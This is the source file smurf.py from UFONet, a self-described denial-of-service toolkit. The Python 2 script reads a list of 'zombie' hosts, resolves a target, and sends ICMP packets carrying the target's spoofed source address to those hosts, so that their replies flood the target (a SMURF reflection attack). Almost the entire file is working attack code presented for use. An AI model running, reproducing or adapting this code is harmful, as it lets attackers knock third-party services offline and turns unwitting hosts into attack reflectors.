smurf.py 4.3 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-"
  3. """
  4. UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)
  5. You should have received a copy of the GNU General Public License along
  6. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  7. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  8. """
  9. import sys, random, socket, urlparse
  10. try:
  11. from scapy.all import *
  12. except:
  13. print "\nError importing: scapy lib. \n\n To install it on Debian based systems:\n\n $ 'sudo apt-get install python-scapy' or 'pip install scapy'\n"
  14. sys.exit(2)
  15. # UFONet ICMP broadcast attack (SMURF)
  16. def randInt():
  17. x = random.randint(1,65535) # TCP ports
  18. return x
  19. def sIP(base_stations): # extract 'base stations'
  20. bs = {}
  21. s_zombie = random.choice(base_stations).strip() # shuffle 'base stations'
  22. if not s_zombie in bs:
  23. try:
  24. s_zombie_ip = socket.gethostbyname(s_zombie)
  25. bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
  26. except:
  27. try:
  28. import dns.resolver
  29. r = dns.resolver.Resolver()
  30. r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
  31. url = urlparse(s_zombie)
  32. a = r.query(url.netloc, "A") # A record
  33. for rd in a:
  34. s_zombie_ip = str(rd)
  35. bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
  36. except:
  37. s_zombie_ip = s_zombie
  38. else:
  39. s_zombie_ip = bs.get(s_zombie)
  40. return s_zombie_ip
  41. def smurfize(ip, sport, rounds):
  42. f = open('botnet/zombies.txt') # use 'zombies' as 'base stations'
  43. base_stations = f.readlines()
  44. base_stations = [ base_station.replace('\n','') for base_station in base_stations ]
  45. f.close()
  46. n=0
  47. try:
  48. for x in range (0,int(rounds)):
  49. n=n+1
  50. s_zombie_ip = sIP(base_stations)
  51. if s_zombie_ip == None: # not any 'base stations' available
  52. print "[Error] [AI] [SMURF] Imposible to retrieve 'base stations' -> [Aborting!]\n"
  53. break
  54. seq = randInt()
  55. window = randInt()
  56. IP_p = IP()
  57. try:
  58. IP_p.src = ip # ICMP 'broadcast' package carring fraudulent (spoofed) source IP belonging to target (aka SMURF attack)
  59. except:
  60. print "[Error] [AI] [SMURF] Imposible to resolve IP from target! -> [Aborting!]\n"
  61. break
  62. try:
  63. IP_p.dst = s_zombie_ip
  64. except:
  65. print "[Error] [AI] [SMURF] Imposible to resolve IP from 'base station' -> [Aborting!]\n"
  66. break
  67. TCP_l = TCP()
  68. TCP_l.sport = sport
  69. TCP_l.dport = sport
  70. TCP_l.seq = seq
  71. TCP_l.window = window
  72. try:
  73. send(IP_p/ICMP(), verbose=0)
  74. print "[Info] [AI] [SMURF] Redirecting 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"] -> [RE-FLUXING!]"
  75. time.sleep(1) # sleep time required for balanced sucess
  76. except:
  77. print "[Error] [AI] [SMURF] Failed to redirect 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"]"
  78. except:
  79. print("[Error] [AI] [SMURF] Failing to engage... -> Is still target online? -> [Checking!]")
  80. class SMURF(object):
  81. def attacking(self, target, rounds):
  82. print "[Info] [AI] ICMP Broadcast (SMURF) is redirecting: [" , rounds, "base stations ]"
  83. if target.startswith('http://'):
  84. target = target.replace('http://','')
  85. sport = 80
  86. elif target.startswith('https://'):
  87. target = target.replace('https://','')
  88. sport = 443
  89. try:
  90. ip = socket.gethostbyname(target)
  91. except:
  92. try:
  93. import dns.resolver
  94. r = dns.resolver.Resolver()
  95. r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
  96. url = urlparse(target)
  97. a = r.query(url.netloc, "A") # A record
  98. for rd in a:
  99. ip = str(rd)
  100. except:
  101. ip = target
  102. if ip == "127.0.0.1" or ip == "localhost":
  103. print "[Info] [AI] [SMURF] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n"
  104. return
  105. smurfize(ip, sport, rounds) # attack with SMURF using threading